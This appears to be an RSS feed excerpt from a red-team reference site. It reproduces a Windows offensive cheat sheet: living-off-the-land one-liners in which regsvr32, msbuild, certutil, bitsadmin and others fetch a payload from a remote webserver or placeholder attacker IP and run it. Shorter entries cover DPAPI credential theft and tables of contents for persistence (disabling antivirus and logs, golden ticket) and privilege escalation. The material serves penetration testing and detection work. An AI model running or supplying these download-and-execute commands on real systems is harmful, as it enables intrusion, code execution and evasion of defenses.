&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Windows&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Microsoft&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NET&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Framework64&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;v4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;30319&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;regasm&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;u&lt;/span&gt; &lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;webdavserver&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;folder&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;dll&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="regsvr32-subtee" class="anchored-heading"&gt;Regsvr32 @subTee&lt;a class="heading-anchor" href="#regsvr32-subtee" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;regsvr32&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;u&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;i:http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;webserver&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;sct&lt;/span&gt; &lt;span class="n"&gt;scrobj&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;dll&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;regsvr32&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;u&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;i:&lt;/span&gt;&lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;webdavserver&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;folder&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;sct&lt;/span&gt; &lt;span class="n"&gt;scrobj&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;dll&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="odbcconf" class="anchored-heading"&gt;Odbcconf&lt;a class="heading-anchor" href="#odbcconf" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;odbcconf&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="n"&gt;regsvr&lt;/span&gt; &lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;webdavserver&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;folder&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;payload_dll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;txt&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="msbuild" class="anchored-heading"&gt;Msbuild&lt;a class="heading-anchor" href="#msbuild" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;cmd&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;V&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;set MB=&amp;#34;&lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Windows&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Microsoft&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NET&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Framework64&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;v4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;30319&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;MSBuild&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;exe&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34; &amp;amp; !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml &amp;gt; payload.xml &amp;amp; !MB! payload.xml&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="certutil" class="anchored-heading"&gt;Certutil&lt;a class="heading-anchor" href="#certutil" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certutil&lt;/span&gt; &lt;span class="n"&gt;-urlcache&lt;/span&gt; &lt;span class="n"&gt;-split&lt;/span&gt; &lt;span class="o"&gt;-f&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;webserver&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;b64&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;b64&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;certutil&lt;/span&gt; &lt;span class="n"&gt;-decode&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;b64&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;dll&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Windows&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Microsoft&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NET&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Framework64&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;v4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;30319&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;InstallUtil&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;logfile&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;LogToConsole&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;false&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;u&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;dll&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certutil&lt;/span&gt; &lt;span class="n"&gt;-urlcache&lt;/span&gt; &lt;span class="n"&gt;-split&lt;/span&gt; &lt;span class="o"&gt;-f&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;webserver&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;b64&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;b64&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;certutil&lt;/span&gt; &lt;span class="n"&gt;-decode&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;b64&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="bitsadmin" class="anchored-heading"&gt;Bitsadmin&lt;a class="heading-anchor" href="#bitsadmin" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;bitsadmin&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;transfer&lt;/span&gt; &lt;span class="n"&gt;mydownloadjob&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;download&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;priority&lt;/span&gt; &lt;span class="n"&gt;normal&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;attackerIP&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;/&lt;/span&gt;&lt;span class="n"&gt;xyz&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;Users&lt;/span&gt;&lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="k"&gt;%&lt;/span&gt;&lt;span class="n"&gt;USERNAME&lt;/span&gt;&lt;span class="p"&gt;%\\&lt;/span&gt;&lt;span class="n"&gt;AppData&lt;/span&gt;&lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;local&lt;/span&gt;&lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;temp&lt;/span&gt;&lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;xyz&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/"&gt;arno0x0x - Windows oneliners to download remote payload and execute arbitrary code&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Windows - DPAPI</title><link>https://bokkapig.pages.dev/refs/internal/redteam/evasion/windows-dpapi/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/evasion/windows-dpapi/</guid><description>&lt;blockquote&gt;
&lt;p&gt;On Windows, credentials saved in the Windows Credentials Manager are encrypted using Microsoft&amp;rsquo;s Data Protection API and stored as &amp;ldquo;blob&amp;rdquo; files in user AppData folder.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#data-protection-api"&gt;Data Protection API&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#list-credential-files"&gt;List Credential Files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#dpapi-localmachine-context"&gt;DPAPI LocalMachine Context&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mimikatz---credential-manager--dpapi"&gt;Mimikatz - Credential Manager &amp;amp; DPAPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#hekatomb---steal-all-credentials-on-domain"&gt;Hekatomb - Steal all credentials on domain&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#donpapi---dumping-dpapi-credz-remotely"&gt;DonPAPI - Dumping DPAPI credz remotely&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="data-protection-api" class="anchored-heading"&gt;Data Protection API&lt;a class="heading-anchor" href="#data-protection-api" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Outside of a domain: the user&amp;rsquo;s &lt;code&gt;password hash&lt;/code&gt; is used to encrypt these &amp;ldquo;blobs&amp;rdquo;.&lt;/li&gt;
&lt;li&gt;Inside a domain: the &lt;code&gt;domain controller's master key&lt;/code&gt; is used to encrypt these blobs.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With the extracted private key of the domain controller, it is possible to decrypt all the blobs, and therefore to recover all the secrets recorded in the Windows identification manager of all the work&lt;br&gt;
stations in the domain.&lt;/p&gt;</description></item><item><title>Windows - Persistence</title><link>https://bokkapig.pages.dev/refs/internal/redteam/persistence/windows-persistence/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/persistence/windows-persistence/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#hide-your-binary"&gt;Hide Your Binary&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#disable-antivirus-and-security"&gt;Disable Antivirus and Security&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#antivirus-removal"&gt;Antivirus Removal&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#disable-windows-defender"&gt;Disable Windows Defender&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#disable-windows-firewall"&gt;Disable Windows Firewall&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#clear-system-and-security-logs"&gt;Clear System and Security Logs&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#simple-user"&gt;Simple User&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#registry-hkcu"&gt;Registry HKCU&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#startup"&gt;Startup&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#scheduled-tasks-user"&gt;Scheduled Tasks User&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bits-jobs"&gt;BITS Jobs&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#serviceland"&gt;Serviceland&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#iis"&gt;IIS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#windows-service"&gt;Windows Service&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#elevated"&gt;Elevated&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#registry-hklm"&gt;Registry HKLM&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#winlogon-helper-dll"&gt;Winlogon Helper DLL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#globalflag"&gt;GlobalFlag&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#startup-elevated"&gt;Startup Elevated&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#services-elevated"&gt;Services Elevated&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#servicesecuritydescriptor"&gt;Service Security Descriptor&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#scheduled-tasks-elevated"&gt;Scheduled Tasks Elevated&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#binary-replacement"&gt;Binary Replacement&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#binary-replacement-on-windows-xp"&gt;Binary Replacement on Windows XP+&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#binary-replacement-on-windows-10"&gt;Binary Replacement on Windows 10+&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#skeleton-key"&gt;Skeleton Key&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#virtual-machines"&gt;Virtual Machines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#windows-subsystem-for-linux"&gt;Windows Subsystem for Linux&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#domain"&gt;Domain&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#golden-certificate"&gt;Golden Certificate&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#golden-ticket"&gt;Golden Ticket&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/fireeye/SharPersist"&gt;SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="hide-your-binary" class="anchored-heading"&gt;Hide Your Binary&lt;a class="heading-anchor" href="#hide-your-binary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Sets (+) or clears (-) the Hidden file attribute. If a file uses this attribute set, you must clear the attribute before you can change any other attributes for the file.&lt;/p&gt;</description></item><item><title>Windows - Privilege Escalation</title><link>https://bokkapig.pages.dev/refs/internal/redteam/escalation/windows-privilege-escalation/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/escalation/windows-privilege-escalation/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#windows-version-and-configuration"&gt;Windows Version and Configuration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#user-enumeration"&gt;User Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#network-enumeration"&gt;Network Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#antivirus-enumeration"&gt;Antivirus Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#default-writable-folders"&gt;Default Writable Folders&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---looting-for-passwords"&gt;EoP - Looting for passwords&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#sam-and-system-files"&gt;SAM and SYSTEM files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#hivenightmare"&gt;HiveNightmare&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#laps-settings"&gt;LAPS Settings&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#search-for-file-contents"&gt;Search for file contents&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#search-for-a-file-with-a-certain-filename"&gt;Search for a file with a certain filename&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#search-the-registry-for-key-names-and-passwords"&gt;Search the registry for key names and passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#passwords-in-unattendxml"&gt;Passwords in unattend.xml&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wifi-passwords"&gt;Wifi passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#sticky-notes-passwords"&gt;Sticky Notes passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#passwords-stored-in-services"&gt;Passwords stored in services&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#passwords-stored-in-key-manager"&gt;Passwords stored in Key Manager&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#passwords-stored-in-uwp-passwordvault"&gt;Passwords stored in UWP PasswordVault&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#powershell-history"&gt;Powershell History&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#powershell-transcript"&gt;Powershell Transcript&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#password-in-alternate-data-stream"&gt;Password in Alternate Data Stream&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---processes-enumeration-and-tasks"&gt;EoP - Processes Enumeration and Tasks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---incorrect-permissions-in-services"&gt;EoP - Incorrect permissions in services&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---windows-subsystem-for-linux-wsl"&gt;EoP - Windows Subsystem for Linux (WSL)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---unquoted-service-paths"&gt;EoP - Unquoted Service Paths&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---path-interception"&gt;EoP - $PATH Interception&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---named-pipes"&gt;EoP - Named Pipes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---kernel-exploitation"&gt;EoP - Kernel Exploitation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---microsoft-windows-installer"&gt;EoP - Microsoft Windows Installer&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#alwaysinstallelevated"&gt;AlwaysInstallElevated&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#customactions"&gt;CustomActions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---insecure-gui-apps"&gt;EoP - Insecure GUI apps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---evaluating-vulnerable-drivers"&gt;EoP - Evaluating Vulnerable Drivers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---printers"&gt;EoP - Printers&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#universal-printer"&gt;Universal Printer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bring-your-own-vulnerability"&gt;Bring Your Own Vulnerability&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---runas"&gt;EoP - Runas&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---abusing-shadow-copies"&gt;EoP - Abusing Shadow Copies&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---from-local-administrator-to-nt-system"&gt;EoP - From local administrator to NT SYSTEM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---living-off-the-land-binaries-and-scripts"&gt;EoP - Living Off The Land Binaries and Scripts&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---impersonation-privileges"&gt;EoP - Impersonation Privileges&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#restore-a-service-accounts-privileges"&gt;Restore A Service Account&amp;rsquo;s Privileges&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#meterpreter-getsystem-and-alternatives"&gt;Meterpreter getsystem and alternatives&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#rottenpotato-token-impersonation"&gt;RottenPotato (Token Impersonation)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#juicy-potato-abusing-the-golden-privileges"&gt;Juicy Potato (Abusing the golden privileges)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#rogue-potato-fake-oxid-resolver"&gt;Rogue Potato (Fake OXID Resolver)&lt;/a&gt;)&lt;/li&gt;
